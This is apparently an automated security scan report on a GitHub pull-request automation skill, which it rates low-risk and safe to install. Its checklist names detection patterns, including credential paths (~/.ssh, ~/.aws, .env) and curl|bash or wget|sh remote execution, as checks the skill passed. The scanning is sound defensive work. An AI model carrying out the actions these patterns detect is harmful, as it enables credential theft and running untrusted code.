Scan Report
5 /100
github-pr-automation
Automate GitHub pull request workflows including creation, review, merging, and monitoring
The skill is a legitimate GitHub PR automation tool using the official gh CLI for all GitHub operations. No malicious behavior, credential harvesting, or undeclared functionality was found.
Safe to install
Approve for use. The skill performs exactly as documented.
| Resource | Declared | Inferred | Status | Evidence |
|---|---|---|---|---|
| Shell | WRITE | WRITE | ✓ Aligned | scripts/create_pr.js:5 - execSync for gh commands; scripts/monitor_pr.js:5 - gh … |
| Filesystem | READ | READ | ✓ Aligned | scripts/create_pr.js:21 - fs.readFileSync for templates |
| Network | READ | READ | ✓ Aligned | All network operations use gh CLI (documented in SKILL.md) |
File Tree
6 files · 10.2 KB · 400 lines JavaScript 2f · 216L
Markdown 3f · 141L
JSON 1f · 43L
├─
▾
references
│ ├─
▾
pr_templates
│ │ ├─
bugfix.md
Markdown
│ │ └─
feature.md
Markdown
│ └─
automation_rules.json
JSON
├─
▾
scripts
│ ├─
create_pr.js
JavaScript
│ └─
monitor_pr.js
JavaScript
└─
SKILL.md
Markdown
Security Positives
✓ Uses official gh CLI for all GitHub operations - no direct API calls
✓ No credential harvesting or environment variable access
✓ Template reading is explicitly documented and expected behavior
✓ No sensitive path access (no ~/.ssh, ~/.aws, .env access)
✓ No base64, eval, or obfuscated code patterns
✓ No network exfiltration or suspicious outbound connections
✓ No remote script execution (no curl|bash or wget|sh patterns)
✓ No dependency on third-party libraries beyond Node.js built-ins